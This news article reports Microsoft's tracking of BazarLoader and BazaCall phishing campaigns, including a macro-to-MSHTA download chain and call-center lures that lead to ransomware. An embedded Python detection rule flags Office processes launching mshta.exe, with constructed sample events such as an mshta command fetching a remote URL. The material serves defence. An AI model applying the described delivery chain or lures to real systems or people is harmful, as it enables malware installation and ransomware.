The Security Intelligence team at Microsoft is once again raising the alarm about a call center phishing campaign it calls BazaCall.
Multiple active campaigns use BazarLoader to deploy a wide range of payloads.
“We are tracking multiple active email campaigns that use BazarLoader to deliver a wide range of payloads. These campaigns appear disparate but share a common trait: their tactics attempt to challenge conventional email security solutions and best practices,” Microsoft said in a tweet.
‘Stolen Images’, the BazarLoader campaign Microsoft has been tracking, uses fake email addresses and copyright infringement notices about “stolen images” to trick users into downloading the malware under the guise of legitimate software.
Another technique is to trick victims into opening emails that they think are from trusted sources.
Attackers also use weaponized Word docs in email attachments:
“A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader,” Microsoft said.
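The process chain in that campaign (a Word macro launching MSHTA to fetch BazarLoader) is something a detection engineer can alert on from endpoint telemetry, which matters here because the password-protected ZIP defeats attachment scanning on the mail gateway. The following is an added example and is not code from Microsoft or from the article; it assumes Sysmon/EDR-style process-creation events with the field names ParentImage, Image and CommandLine, and the sample events are constructed for illustration.

```python
"""Host-side detection for an Office macro spawning mshta.exe.

Added example (not Microsoft's or the article's code). Assumes
process-creation events shaped like Sysmon Event ID 1, with the
fields ParentImage, Image and CommandLine; rename to fit your telemetry.
"""
import re

# Office applications whose macros are commonly abused to spawn a downloader.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Signed Windows binaries that can fetch and execute remote content.
LOLBIN_CHILDREN = {"mshta.exe"}

# A remote target on the command line: http(s) URL or a UNC path (\\host\share).
REMOTE_ARG = re.compile(r"https?://|\\\\[^\\]+\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Classify one process-creation event.

    Returns "high" when an Office process launches mshta.exe with a remote
    target (the BazarLoader delivery pattern), "medium" when an Office
    process launches mshta.exe at all, and None otherwise.
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in LOLBIN_CHILDREN:
        return None
    if REMOTE_ARG.search(event.get("CommandLine", "")):
        return "high"
    return "medium"


def triage(events):
    """Return (EventId, severity) for every event worth an analyst's attention."""
    hits = []
    for event in events:
        severity = classify(event)
        if severity is not None:
            hits.append((event["EventId"], severity))
    return hits


# Constructed sample events for illustration; not real telemetry.
SAMPLE_EVENTS = [
    {   # Word macro launching mshta.exe against a remote URL: the described chain.
        "EventId": 1,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "CommandLine": "mshta.exe http://example.invalid/index.html",
    },
    {   # mshta.exe started from Explorer on a local file: normal admin tooling.
        "EventId": 2,
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\mshta.exe",
        "CommandLine": "mshta.exe C:\\tools\\helper.hta",
    },
    {   # Word spawning its printing helper: benign child process.
        "EventId": 3,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
    {   # Excel launching mshta.exe on a local .hta: suspicious, no remote fetch.
        "EventId": 4,
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
        "Image": "C:\\Windows\\SysWOW64\\mshta.exe",
        "CommandLine": "mshta C:\\Users\\Public\\run.hta",
    },
]


if __name__ == "__main__":
    for event_id, severity in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}")
```

The rule keys on the parent/child relationship rather than on the document or the URL, so it survives the attacker rotating the lure, the ZIP password and the download host; the "medium" tier catches Office-to-MSHTA launches that use a local stager instead of a direct download.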
Microsoft first documented BazaCall in June. At that time the campaign mainly sent phishing emails with fraudulent claims about expired trial subscriptions and impending payments.
The emails usually do not contain links to web pages. Instead, they encourage potential victims to contact a call center.
The first point of contact is a call center operator who talks the victim through the details of the fake issue and persuades them to visit a website that supposedly lets them cancel the subscription. The operator then walks them through installing a supposedly necessary tool, which is in fact the malware.
The BazarLoader backdoor installed this way gives the actors a foothold for deploying ransomware such as Ryuk and Conti.
What makes these campaigns notable is that they do not rely on regular phishing mechanics: the emails carry no malicious links or attachments for email security tools to flag. The malicious step instead happens over the phone, with the operator's voice doing the work a payload would normally do.
“BazarLoader is a first-stage malware that allows remote attackers to gain control over an affected device, exfiltrate data, and install ransomware payloads – notably Conti. The multi-component and evasive nature of these attacks requires comprehensive protection,” Microsoft notes.